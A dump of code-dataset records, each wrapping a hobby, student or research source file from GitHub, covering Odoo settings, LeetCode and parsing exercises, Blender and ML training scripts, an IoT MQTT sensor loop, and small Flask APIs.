self.alias_domain )\n\n @api.model\n def get_values(self):\n res = super(HrLeaveConfigSettings, self).get_values()\n get_param = self.env['ir.config_parameter'].sudo().get_param\n res.update(\n alias_prefix=get_param('alias_prefix', default=''),\n alias_domain=get_param('alias_domain', default=''),\n )\n return res\n\n","repo_name":"cybergate-services/cybererp","sub_path":"custom-addons/hr_leave_request_aliasing/models/res_config.py","file_name":"res_config.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"38218077079","text":"\"\"\"\nGiven an array of size n, find the majority element. The majority element is the element that appears more than ⌊ n/2 ⌋ times.\n\nYou may assume that the array is non-empty and the majority element always exist in the array.\n\nSolutions:\n\n1. Dictionary\nCreate a dict with number as key and count as value\nStore the max(d.values()) in a var\nIterate over the dict and return the key, if d[key] == max(d.values())\n\n2. Using count keyword - but this would lead to time limit exceeded error if the array is really huge\n\n3. No extra space 0(n) time \nHave 2 variables, major and count = 0.\nIterate over the list. We know that majority element will be present more than 50% times in the array.\nIf count == 0, then set majority element as current num\nelse if count >0 and if current num != majority element, decrement count\nelse, increment count\n\n4. Got few more ideas from here:\nhttps://discuss.leetcode.com/topic/17446/6-suggested-solutions-in-c-with-explanations/2\n\n\"\"\"\n\nclass Solution(object):\n def majorityElement(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n \n count = 0\n for num in nums:\n if not count:\n major = num\n count += 1\n \n elif count > 0 and num != major:\n count -= 1\n \n else:\n count += 1\n \n return major\n \n \n \"\"\"\n d = {}\n \n for i in nums:\n if i not in d:\n d[i] = 1\n else:\n d[i] += 1\n \n count = max(d.values())\n for k,v in d.items():\n if d[k] == count:\n return k\n \"\"\"\n \n \"\"\" \n # Solution 2\n\n for num in nums:\n if nums.count(num) > len(nums)/2:\n return num\n \"\"\"","repo_name":"sjayster/Leetcode","sub_path":"majority-element.py","file_name":"majority-element.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36119226096","text":"from models.detalle_orden import Detalle_Orden\nfrom models.producto import Producto\nfrom models.orden import Orden\n\nclass Detalle_Orden_Controller(Orden):\n def __init__(self):\n self.detalle_orden = Detalle_Orden()\n self.producto = Producto()\n self.orden = Orden()\n self.close = False\n\n def read_products(self):\n productos = self.producto.read_products()\n\n if productos:\n print(\"ID PRODUCTO NOMBRE PRODUCTO MARCA DESCRIPCION PRECIO\")\n print(\"-------------------------------------------------------------------------------\")\n for i in productos:\n print(f\"{i[0]}\\t {i[1].ljust(20)}{i[2].ljust(16)}{i[3].ljust(20)}{i[4]}\")\n\n \n def detail_order(self,id_orden,id_producto,cantidad_producto,total_producto,total):\n detail_order = self.detalle_orden.read_detail_order()\n\n if detail_order:\n print(\"\\n\")\n print(\"\\nID ORDEN ID PRODUCTO ID CLIENTE CANT. PRODUCTO TOTAL POR PRODUCTO STATUS FECHA TOTAL\")\n print(\"---------------------------------------------------------------------------------------------------------------------------------------\")\n for i in detail_order:\n print(f\"{i[0]}\\t {i[1]}\\t {i[2]}\\t {i[3]}\\t {i[4]}\\t {i[5]}\\t {i[6]}\\t{i[4]}\")\n print(\"---------------------------------------------------------------------------------------------------------------------------------------\")\n print(\"TOTAL PAGAR: \",total)\n\n def create_detail_order(self,id_orden,id_producto,cantidad_producto,total_producto,total):\n self.detalle_orden.id_orden = id_orden\n self.detalle_orden.id_producto = id_producto\n self.detalle_orden.cantidad_producto = cantidad_producto\n self.detalle_orden.total_producto = total_producto\n\n self.detalle_orden.create_a_details_order()\n self.detail_order(id_orden,id_producto,cantidad_producto,total_producto,total)\n \"\"\"productos = self.producto.read_products()\n print(id_orden)\n self.detalle_orden.id_orden = id_orden\n total_producto = 0.0\n if type(id_orden) == int:\n id_producto = ' '\n while id_producto != '':\n id_producto = int(input(\"Elija producto por su ID: \"))\n self.detalle_orden.id_producto = id_producto\n for i in productos:\n if i[0] == id_producto:\n precio = i[4]\n cantidad_producto = int(input(\"Ingrese cantidad: \"))\n self.detalle_orden.cantidad_producto = cantidad_producto\n\n precio_cantidad = precio * cantidad_producto\n total_producto = precio_cantidad \n\n self.detalle_orden.total_producto = total_producto\n \n respuesta = input(\"Seguira ingresando mas productos? Y/N:\")\n if respuesta == 'Y' or respuesta == 'y':\n self.detalle_orden.create_a_details_order()\n pass\n elif respuesta == 'N' or respuesta == 'n':\n self.detalle_orden.create_a_details_order()\n self.detail_order(total)\n \"self.detalle_orden.update_a_details_order()\"\n break \n else:\n print(\"No se pudo crear orden. Revisa.\")\n\"\"\"","repo_name":"mariotorres94/Hackaton---7","sub_path":"controller/detalle_orden_controller.py","file_name":"detalle_orden_controller.py","file_ext":"py","file_size_in_byte":3635,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1373857316","text":"import bpy\n# import rosbag\nimport os\nimport glob\nimport numpy as np\nimport pandas as pd\nimport time\nimport cv2\nimport matplotlib.pyplot as plt \n\nfrom geometry_msgs.msg import PoseStamped, Pose\n\n# Define vertices and faces\nverts = [(0, 0, 0), (0, 5, 0), (5, 5, 0), (5, 0, 0)]\nfaces = [(0, 1, 2, 3)]\n\nMAP_NAME = 'flat'\n\nMAP_KEY = 'Grid'\nMAP_PATH = '/home/francesco/Documents/Master-Thesis/core/maps/{}.png'.format(MAP_NAME)\nTEX_NAME = 'Texture'\nMAT_NAME = 'Mat'\n\nbpy.context.scene.unit_settings.system = 'METRIC'\nbpy.context.scene.render.engine = 'CYCLES'\n# bpy.context.scene.cycles.feature_set = 'EXPERIMENTAL'\n# bpy.context.scene.cycles.device = 'GPU'\n\ntop_cam = bpy.data.cameras.new(\"Camera\")\ntop_cam_ob = bpy.data.objects.new(\"Camera\", top_cam)\nbpy.context.scene.objects.link(top_cam_ob)\n\ntop_cam_ob.location = [0,0,15]\ntop_cam_ob.rotation_euler = [0,0,0]\n\nbpy.context.scene.camera = top_cam_ob\n\nprint(list(bpy.data.objects))\nkrock = bpy.data.objects['krock']\nkrock.name = 'krock'\nkrock.scale = [0.2, 0.2, 0.2]\n\n\n\nif MAP_KEY not in bpy.data.objects:\n bpy.ops.mesh.primitive_grid_add(x_subdivisions=513, y_subdivisions=513)\n\nlamp = bpy.data.lamps['Lamp'].type = 'HEMI'\n\nmap = bpy.data.objects[MAP_KEY]\nimage = cv2.imread(MAP_PATH)\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\nif image.dtype == 'uint8':\n image = image / 256.\nif image.dtype == 'uint16':\n image = image / 65536.\nif image.dtype == 'uint32':\n image = image / 4294967296.\n\nprint(np.max(image))\nmap.location = [map.location[0], map.location[1], map.location[2] - np.max(image)]\n\nscale = (513 * 0.02) / 2\n\nmap.scale = (scale, scale, scale)\nmap.location = [map.location[0], map.location[1], map.location[2]]\n# map.rotation_euler = [0,0, np.radians(90)]\n# create texture\ntex = bpy.data.textures.new(TEX_NAME, 'IMAGE')\nimage = bpy.data.images.load(MAP_PATH)\ntex.image = image\n\nmaterial = bpy.data.materials.new(MAT_NAME)\n# add texture to material\nslot = bpy.data.materials[MAT_NAME].texture_slots.add()\nslot.texture = tex\nbpy.data.materials[MAT_NAME].active_texture = tex\n# create modifier\nmod = map.modifiers.new(\"disp\", 'DISPLACE')\nmod.texture = tex\nmod.mid_level = 0\n\nmat = bpy.data.materials.new('bricks')\n\nmap.data.materials.append(mat)\nmat.use_nodes = True\n\n# create the texture node\ntree = mat.node_tree\n\nlinks = tree.links\ntext_brick = tree.nodes.new(type='ShaderNodeTexBrick')\n\ntext_brick.offset = 0\n\ntext_brick.inputs[1].default_value = [0.471, 0.643, 0.694, 1]\ntext_brick.inputs[2].default_value = [0.471, 0.643, 0.694, 1]\ntext_brick.inputs[3].default_value = [1, 1, 1, 1]\n\ntext_brick.inputs[4].default_value = 1.0\ntext_brick.inputs[5].default_value = 0.0005\ntext_brick.inputs[6].default_value = 0\ntext_brick.inputs[8].default_value = 0.01\ntext_brick.inputs[9].default_value = 0.01\n\ndiff = tree.nodes['Diffuse BSDF']\n# connect to our material\nlinks.new(text_brick.outputs[0], diff.inputs[0])\n\n# bpy.ops.object.modifier_add(type=\"DISPLACE\")\n\ncamera = bpy.data.objects['Camera']\n\nBAG_FOLDER = '/home/francesco/Desktop/carino/vaevictis/data/dataset/'\nfiles = glob.glob(BAG_FOLDER + '/{}/*.csv'.format(MAP_NAME))\n\ndef msg2pose(msg):\n position = msg.pose.position\n orientation = msg.pose.orientation\n\n return [[position.x, position.y, position.z],\n [orientation.w, orientation.x, orientation.y, orientation.z]]\n\ndef bag2pose(file_path):\n bag = rosbag.Bag(file_path)\n for i, (topic, msg, t) in enumerate(bag.read_messages(topics=['pose'])):\n yield msg2pose(msg)\n\ndef csv2pose(file_path):\n df = pd.read_csv(file_path)\n for index, row in df.iterrows():\n position = row['pose__pose_position_x'], row['pose__pose_position_y'], row['pose__pose_position_z']\n orientation = row['pose__pose_orientation_x'], row['pose__pose_orientation_y'], row['pose__pose_orientation_z'], row['pose__pose_orientation_w']\n advancement = row['advancement']\n\n advancement = np.clip(advancement, 0, 0.16)\n\n yield position, orientation, advancement/ 0.16\n\ndef pose(file_path):\n filename, file_extension = os.path.splitext(file_path)\n if file_extension == '.bag':\n pose = bag2pose(file_path)\n elif file_extension == '.csv':\n pose = csv2pose(file_path)\n return pose\n\ncamera = bpy.data.cameras['Camera']\ncamera.lens_unit = 'FOV'\ncamera.angle = 1.05\n\nscene = bpy.context.scene\n\nscene.cycles.samples = 32\nscene.render.resolution_x = 640\nscene.render.resolution_y = 480\ncamera = bpy.data.objects['Camera']\n\ncamera.parent = krock\n\nprint(files[0])\nframe_idx = 0\nskip = 10\n\nbpy.context.scene.objects.active = krock\n\nkrock_mat = krock.data.materials[0]\nkrock_mat.use_nodes = True\ntree = krock_mat.node_tree\nlinks = tree.links\n# text_brick = tree.nodes.new(type='DiffuseBSDF')\ndiff = tree.nodes['Diffuse BSDF']\n# connect to our material\n\n\ncmap = plt.cm.get_cmap('Spectral')\n\nfor file in files:\n for i, (position, orientation, advancement) in enumerate(pose(file)):\n if i % skip == 0:\n krock.location = position\n krock.rotation_quaternion = orientation\n # print(advancement)\n diff.inputs[0].default_value = cmap(advancement)\n diff.inputs[0].keyframe_insert(data_path=\"default_value\", frame=frame_idx)\n krock.keyframe_insert(data_path=\"location\", frame=frame_idx)\n frame_idx += 1\n\n # print(position, orientation)\n \n # time.sleep(1)\n # break\n # bpy.context.scene.render.filepath = \"/home/francesco/Desktop/diocane/{}.jpg\".format(i)\n # bpy.ops.render.render(use_viewport = True, write_still=True)\n\nbpy.context.scene.render.image_settings.file_format='JPEG'\n\nbpy.context.scene.render(animation=True)\n# bpy.context.scene.render.filepath = \"/home/francesco/Desktop/diocane/{}.jpg\".format(i)\n\n\n# camera.parent = krock\n\n# krock.location = [1.0, 0.33, -0.165]\n# krock.rotation_mode = 'QUATERNION'\n# krock.rotation_quaternion = [0.98, 0.14, -0.0, -0.03]\n\n# camera.location = [0.16, 0, 0]","repo_name":"FrancescoSaverioZuppichini/Master-Thesis","sub_path":"core/blender/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5949,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"20309251509","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 17 16:36:49 2023\n\n@author: chaol\n\nNOTE: \n GLOBAL_VARIABLE\n local_variable\n functionToRun\n Function_Input_Or_Ouput_Variable\n \n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import train_test_split\n\ndef runLocallyOrRemotely():\n locally_or_remotely = input(\"Run the code locally? [y/n/wsl]:\")\n if locally_or_remotely == 'y':\n repo_location = \"D:/OneDrive - Kyushu University/15_Article/03_RStudio/\"\n repo_result_location = \"D:/OneDrive - Kyushu University/15_Article/03_RStudio/07_PyResults/\"\n elif locally_or_remotely == 'n':\n repo_location = \"/home/usr6/q70176a/DP15/\"\n repo_result_location = \"/home/usr6/q70176a/DP15/03_Results/\"\n elif locally_or_remotely == 'wsl':\n repo_location = \"/mnt/d/OneDrive - Kyushu University/15_Article/03_RStudio/\"\n repo_result_location = \"/mnt/d/OneDrive - Kyushu University/15_Article/03_RStudio/07_PyResults/\"\n return repo_location, repo_result_location\n\n# update 2023.1.30\ndef getXandY(Output_Vari):\n y = pd.read_csv(REPO_LOCATION + \"01_Data/10_y_\" + Output_Vari + \"_29IndVar.csv\", index_col=0)\n y = y.iloc[:,0].to_numpy().astype('int')\n X = pd.read_csv(REPO_LOCATION + \"01_Data/09_X_\" + Output_Vari + \"_29IndVar.csv\", index_col=0)\n return X, y\n\nREPO_LOCATION, REPO_RESULT_LOCATION = runLocallyOrRemotely()\nX, y = getXandY(\"LSoverall\")\n\n\nmodel_cls = RandomForestRegressor(n_estimators=1000, random_state=1,\n n_jobs = -1, oob_score = True) \nmodel_cls.fit(X, y)\nprint(model_cls.oob_score_)\n\nmodel_reg = RandomForestRegressor(n_estimators=1000, random_state=1,\n n_jobs = -1, oob_score = True) \nmodel_reg.fit(X, y)\nprint(model_reg.oob_score_)\n\n\"\"\"\nThis script is to confirm whether cls is better than reg.\nRESULT reg is better\n\"\"\"","repo_name":"MichaelChaoLi-cpu/Greenness_NighttimeLight_WB","sub_path":"06_PyCode/09_TE_CompareClsReg_v1.py","file_name":"09_TE_CompareClsReg_v1.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"69843060371","text":"#import os\n#import socket\n#import SSD1306\n#from machine import ADC\n#from machine import Pin, I2C\nimport time\nimport machine\nimport pycom\nfrom pycoproc_2 import Pycoproc\nfrom mqtt import MQTTClient_lib as MQTTClient\nfrom network import WLAN\nfrom SI7006A20 import SI7006A20\nfrom MPL3115A2 import MPL3115A2,ALTITUDE,PRESSURE\n\n\n\npycom.heartbeat(False)\npycom.rgbled(0xA0009)\nOLED_WIDTH = 128\nOLED_HEIGHT = 64\npy = Pycoproc()\n\nif wlan.isconnected():\n pycom.rgbled(0x000F00)\nelse:\n pycom.rgbled(0x0F000)\n\n\"\"\"\n#I2C\ni2c = I2C(0)\ni2c = I2C(0, I2C.MASTER)\ni2c = I2C(0, pins=('P9','P10')) # create and use default PIN assignments (P9=SDA, P10=SCL)\ni2c.init(I2C.MASTER, baudrate=10000) # init as a master\n\"\"\"\n\n#Internal temp\nsi = SI7006A20(py)\nmp = MPL3115A2(py,mode=ALTITUDE) # Returns height in meters. Mode may also be set to PRESSURE, returning a value in Pascals\nmpp = MPL3115A2(py,mode=PRESSURE) # Returns pressure in Pa. Mode may also be set to ALTITUDE, returning a value in meters\n\n\n#MQTT\ndef sub_cb(topic, msg):\n print(msg)\n\nclient = MQTTClient(\"sensor\", \"192.168.10.30\", port=1883, keepalive=300)\nclient.set_callback(sub_cb)\nclient.connect()\n\n\n\"\"\"\n#initalize the ssd1306 oled screen\noled = SSD1306.SSD1306_I2C(OLED_WIDTH, OLED_HEIGHT, i2c)\nblack = 0x000000 # black color\n\n# draw a black rectangle as a way to clear the screen\ndef clear_oled(oled):\n oled.fill_rect(0,0,OLED_WIDTH,OLED_HEIGHT,black)\n\"\"\"\n\nwhile True:\n temperature = si.temperature()\n altitude = mp.altitude()\n pressure = mpp.pressure()\n humidity = si.humidity()\n dew_point = si.dew_point()\n battery_left = py.read_battery_voltage()\n client.publish(topic=\"Temperature\", msg=str(temperature))\n client.publish(topic=\"Altitude\", msg=str(altitude))\n client.publish(topic=\"Pressure\", msg=str(pressure))\n client.publish(topic=\"humidity\", msg=str(humidity))\n client.publish(topic=\"Dew_point\", msg=str(dew_point))\n client.publish(topic=\"Battery\", msg=str(battery_left))\n time.sleep(300)\n\n #time.sleep(5)\n #clear_oled(oled)\n #oled.text(str(celcius), 0, 0)\n #oled.show()\n #clear_oled(oled)\n","repo_name":"granback/IoT","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23242330739","text":"import os\nfrom typing import Tuple, Sequence, Callable\nimport csv\nimport numpy as np\nfrom PIL import Image\nimport torch\nimport torch.optim as optim\nfrom torch import nn, Tensor\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchinfo import summary\nfrom torchvision import transforms\nimport random\nfrom efficientnet_pytorch import EfficientNet\n\nseed = 0\nrandom.seed(seed)\nnp.random.seed(seed)\nos.environ[\"PYTHONHASHSEED\"] = str(seed)\ntorch.manual_seed(seed)\ntorch.cuda.manual_seed(seed)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = True\n\n\nclass MnistDataset(Dataset):\n def __init__(\n self,\n dir: os.PathLike,\n image_ids: os.PathLike,\n transforms: Sequence[Callable]\n ) -> None:\n self.dir = dir\n self.transforms = transforms\n self.labels = {}\n\n with open(image_ids, 'r') as f:\n reader = csv.reader(f)\n next(reader)\n for row in reader:\n self.labels[int(row[0])] = list(map(int, row[1:]))\n\n self.image_ids = list(self.labels.keys())\n\n def __len__(self) -> int:\n return len(self.image_ids)\n\n def __getitem__(self, index: int) -> Tuple[Tensor]:\n image_id = self.image_ids[index]\n image = Image.open(\n os.path.join(\n self.dir, f'{str(image_id).zfill(5)}.png')).convert('RGB')\n\n target = np.array(self.labels.get(image_id)).astype(np.float32)\n\n if self.transforms is not None:\n image = self.transforms(image)\n\n return image, target\n\n\ntransforms_train = transforms.Compose([\n transforms.RandomHorizontalFlip(p=0.5),\n transforms.RandomVerticalFlip(p=0.5),\n transforms.RandomAffine(random.randint(0, 360)),\n transforms.ColorJitter(contrast=(0.2, 3)),\n transforms.ToTensor(),\n transforms.Normalize(\n [0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225]\n )\n])\n\ntransforms_validation = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(\n [0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225]\n )\n])\n\ntransforms_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(\n [0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225]\n )\n])\n\ntrainset = MnistDataset('data/train', 'data/dirty_mnist_answer.csv', transforms_train)\nvalidationset = MnistDataset('data/validation', 'data/dirty_mnist_answer-validation.csv', transforms_test)\ntestset = MnistDataset('data/test', 'data/sample_submission.csv', transforms_test)\n\ntrain_loader = DataLoader(trainset, batch_size=8, num_workers=2)\nvalidation_loader = DataLoader(validationset, batch_size=8, num_workers=2)\ntest_loader = DataLoader(testset, batch_size=8, num_workers=2)\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nprint(device)\n\nmodel = EfficientNet.from_pretrained(\"efficientnet-b7\", num_classes=26)\nmodel = nn.DataParallel(model).to(device)\nprint(summary(model, input_size=(1, 3, 256, 256), verbose=0))\n\noptimizer = optim.Adam(model.parameters(), lr=1e-3)\ncriterion = nn.MultiLabelSoftMarginLoss()\n\nnum_epochs = 60\n\nmodel.train()\ntest_result = [] # validation 결과 모아서 보기\n\npath = \"./efficientnets/\"\n\nfor epoch in range(num_epochs):\n for i, (images, targets) in enumerate(train_loader):\n optimizer.zero_grad()\n\n images = images.to(device)\n targets = targets.to(device) \n outputs = model(images)\n \n loss = criterion(outputs, targets)\n loss.backward()\n optimizer.step()\n \n if (i+1) % 10 == 0: \n outputs = outputs > 0.5\n acc = (outputs == targets).float().mean()\n print(f'{epoch}: {loss.item():.5f}, {acc.item():.5f}')\n\n model.eval()\n batch_size = test_loader.batch_size\n batch_index = 0\n valid_count = 0\n\n for i, (images, targets) in enumerate(validation_loader):\n images = images.to(device)\n targets = targets.to(device)\n outputs = model(images)\n loss = criterion(outputs, targets)\n result = str(epoch) + \" : \" + str(loss.item())\n test_result.append(result)\n outputs = outputs > 0.5\n batch_index = i * batch_size\n acc = (outputs == targets).float().mean()\n \n \n valid_count += 1\n if valid_count == 5:\n break\n\n print(\"valid\", f'{epoch}: {loss.item():.5f}, {acc.item():.5f}')\n\n torch.save(model, path+\"epoch\"+str(epoch)+\".pt\")\n model.train()\n \nprint(test_result)","repo_name":"Dacon-ISYS/Dacon-Dirty-Alphabet-Mnist","sub_path":"save_per_epoch_efficientnet.py","file_name":"save_per_epoch_efficientnet.py","file_ext":"py","file_size_in_byte":4494,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"14299226684","text":"from invalid_symbol_error import InvalidSymbolError\nfrom ll1_table import terminals, table\nfrom sys import argv\n\nclass Parser():\n\n def __init__(self, table, terminals):\n self.table = table\n self.variables = list(table.keys())\n self.terminals = terminals # make this simple, and just find the lowercase things\n\n def get_terminals(self):\n return self.terminals\n\n def get_variables(self):\n return self.variables\n\n def __format_string(self, string):\n return string.replace(' ', '').replace('\\n', '') + '$'\n\n def validate(self, string):\n string = self.__format_string(string)\n\n if len(list(filter(lambda input_char : input_char not in self.terminals, string[:len(string)-1]))) != 0:\n raise InvalidSymbolError(\"ERROR_INVALID_SYMBOL\")\n\n stack = [\"$\", \"S\"]\n for i, char in enumerate(string):\n\n print('{:<25} {}'.format(string[i:], ''.join(stack[::-1])))\n\n if len(stack) == 0:\n return False # unread input\n\n # apply production rules until top of stack is no longer a variable\n while stack[-1] in self.variables:\n production = self.table[stack[-1]].get(char, None)\n if production is None:\n return False\n else:\n stack.pop()\n # push right hand side of productions to stack, ignore '' (epsilon)\n stack.extend(list(filter(lambda alpha : alpha != '', production))[::-1])\n\n print('{:<25} {}'.format(string[i:], ''.join(stack[::-1])))\n\n if stack[-1] in self.terminals and stack[-1] == char:\n stack.pop()\n else:\n return stack[-1] == char and stack[-1] == '$' and stack[-1] not in self.terminals\n\n return False\n\n\n\n\ndef main():\n\n if len(argv) < 2:\n print(\" File path to string required as argument\")\n quit()\n\n parser = Parser(table, terminals)\n\n try:\n string = open(argv[1]).read().replace('\\n', '').replace(\" \", \"\")\n except FileNotFoundError as e:\n print(\"Invalid file path\")\n quit()\n except Exception as e:\n print(e.__repr__())\n quit()\n\n try:\n print(\"ACCEPTED\") if parser.validate(string) else print(\"REJECTED\")\n except InvalidSymbolError as e:\n print(e.__str__())\n except Exception as e:\n print(e.__repr__())\n return\n\nif __name__ == '__main__':\n main()\n","repo_name":"EricNRodriguez/LL-1-Table-Driven-Parser","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43616498199","text":"\"\"\"\nTests relating to record metadata.\n\n- Setting the 'outcome' attribute.\n\"\"\"\nimport os\nimport sys\nfrom pathlib import Path\nos.chdir(Path(__file__).parent)\nfrom utils_for_testing import clean_project\n\ndef test_outcome():\n\n projectroot = Path(__file__).parent/\"test_project\"\n projectpath = str(projectroot.absolute())\n if str(projectpath) not in sys.path:\n sys.path.insert(0, projectpath)\n\n # Clear the runtime directory and cd into it\n clean_project(projectroot)\n os.makedirs(projectroot/\"data\", exist_ok=True)\n os.chdir(projectroot)\n\n # Define a task which takes different outcomes\n from tasks import Polar\n task_succeed = Polar(x=1, y=0, reason=\"pytest\")\n task_undefined = Polar(x=0, y=0, reason=\"pytest\")\n\n task_succeed.run()\n task_undefined.run()\n\n from smttask.view import RecordStoreView\n RecordStoreView.default_project_dir = projectpath\n recordlist = RecordStoreView().list\n # Most recent records come first\n assert \"undefined\" in recordlist[0].outcome\n assert \"undefined\" not in recordlist[1].outcome\n","repo_name":"alcrene/smttask","sub_path":"tests/test_metadata.py","file_name":"test_metadata.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"8739564130","text":"# Short Version\r\nimport turtle\r\nimport random\r\nimport subprocess\r\ns = turtle.getscreen()\r\ns.setup(width=1000, height=1000)\r\nt = turtle\r\n\r\nt.penup()\r\nt.goto(0,-400)\r\nt.pendown()\r\nt.speed(1) # This is the slowest that it will draw\r\n\t\t# Speeds go 1 to 10, and then supefast is zero\r\nt.pensize(5)\r\nt.circle(420)\r\nt.pensize(2)\r\nt.speed(0) # This is the fastest that it will draw\r\nt.left(90)\r\nt.forward(380)\r\nt.right(90)\r\nt.circle(40, 22.5)\r\n\r\nfor i in range(15): # This is a function that gets repeated 15 times\r\n\t\t\t\t\t# that way you don't have to copy the code 15-times...☺\r\n\tt.right(90)\r\n\tt.forward(380)\r\n\tt.left(180)\r\n\tt.forward(380)\r\n\tt.right(90)\r\n\tt.circle(40, 22.5)\r\n\r\nt.right(90)\r\nt.forward(340)\r\nt.left(90)\r\nt.circle(380)\r\n\r\nt.done()","repo_name":"Chrisdontm/Short_Version","sub_path":"Short version.py","file_name":"Short version.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74552114769","text":"# main.py\nfrom flask import Flask, request, jsonify\nfrom application.campaign_service import CampaignService\nfrom infrastructure.adapters.firebase_campaign_repository import FirebaseCampaignRepository\n\napp = Flask(__name__)\ncampaign_repository = FirebaseCampaignRepository()\ncampaign_service = CampaignService(campaign_repository)\n\n@app.route('/backoffice/campaigns/newCampaign', methods=['POST'])\ndef create_campaign():\n try:\n campaign_data = request.get_json()\n print(\"DATA :\", campaign_data)\n campaign_service.create_campaign(campaign_data)\n return jsonify({'status': 'success', 'data': campaign_data}), 201\n except Exception as e:\n print(f\"Error creating campaign: {e}\")\n return jsonify({'status': 'error', 'message': 'Internal Server Error'}), 500\n\n@app.route('/backoffice/campaigns/update/', methods=['PATCH'])\ndef update_campaign(campaign_id):\n try:\n campaign_data = request.get_json()\n campaign_service.update_campaign(campaign_id, campaign_data)\n return jsonify({'status': 'success', 'message': 'Campaign updated successfully.'}), 200\n except Exception as e:\n print(f\"Error updating campaign: {e}\")\n return jsonify({'status': 'error', 'message': 'Internal Server Error'}), 500\n \n@app.route('/backoffice/campaign/', methods=['GET'])\ndef get_campaign(campaign_id):\n try:\n campaign = campaign_service.get_campaign(campaign_id)\n if campaign:\n return jsonify({'status': 'success', 'data': campaign}), 200\n else:\n return jsonify({'status': 'not found', 'message': 'Campaign not found'}), 404\n except Exception as e:\n print(f\"Error retrieving campaign: {e}\")\n return jsonify({'status': 'error', 'message': 'Internal Server Error'}), 500 \n \n@app.route('/backoffice/campaign/', methods=['GET'])\ndef get_all_campaigns():\n try:\n campaigns = campaign_service.get_all_campaigns()\n return jsonify({'status': 'success', 'data': campaigns}), 200\n except Exception as e:\n print(f\"Error retrieving campaigns: {e}\")\n return jsonify({'status': 'error', 'message': 'Internal Server Error'}), 500 \nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n","repo_name":"LuiggiPasacheL/CanjeXpress_G4","sub_path":"backend/backoffice/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5720119972","text":"\ndef SieveOfEratosthenes(num):\n res = []\n boolArr = [True for _ in range(num+1)]\n val = 2\n while val*val <= num:\n if boolArr[val]:\n for p in range(val*val,num+1,val):\n boolArr[p] = False\n val += 1\n for p in range(2,num+1):\n if boolArr[p] == True:\n res.append(p)\n return res\n\nif __name__=='__main__':\n print(SieveOfEratosthenes(20))","repo_name":"chaitanyatyagi/Important-Algorithms","sub_path":"Basic-Algo/sieve_of_eratosthenes.py","file_name":"sieve_of_eratosthenes.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33541519860","text":"#from flask import Flask, request, jsonify\nfrom flask import Flask,request,jsonify\nfrom flask_cors import CORS\nfrom nosql import *\n\n#crea una instancia de la clase Flask\nservidor = Flask(__name__)\nCORS(servidor)\n\n#---[Prueba]--------------------------\n@servidor.route(\"/prueba\")\ndef prueba():\n return \"Ok, exito en el servidor\"\n\n#---[GET] : consultar ----------------\n@servidor.route(\"/mas_recientes\", methods=['GET'])\ndef consultaProductos():\n #datos = {'respuesta': 'Por implementar'}\n nosql = NOSQL()\n datos = nosql.consultar('productos')\n\n return jsonify({'message': 'Proceso con exito',\n 'object': 'list to dictionary',\n 'data': datos}),200\n\n#---[POST] : adicionar ---------------\n@servidor.route(\"/mas_recientes\", methods=['POST'])\ndef adicionarProductos():\n datos = request.json\n\n nosql = NOSQL()\n nosql.insert('productos', datos['codigo'], datos)\n\n #print(datos)\n return jsonify({'message': 'Proceso con exito',\n 'object': 'text',\n 'data': 'Ok'}),200\n\n#---[Update] : Actualziar\n@servidor.route(\"/mas_recientes\", methods=['PUT'])\ndef actualizarProductos():\n nosql = NOSQL()\n datos = request.json\n nosql.update('productos',datos['codigo'],'precio', datos['precio']) \n #print(datos)\n return jsonify({'message': 'Proceso con exito',\n 'object': 'text',\n 'data': 'Ok'}),200 \n\n#-------------------------------------\nif __name__ == '__main__':\n servidor.run(debug=True)\n\n","repo_name":"David-ctrlDev/apipy","sub_path":"servidor/servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74594434407","text":"from torch import nn\n\nfrom ..model.take_first_module import TakeFirst\n\n\n# A PyTorch LSTM model designed for computing a 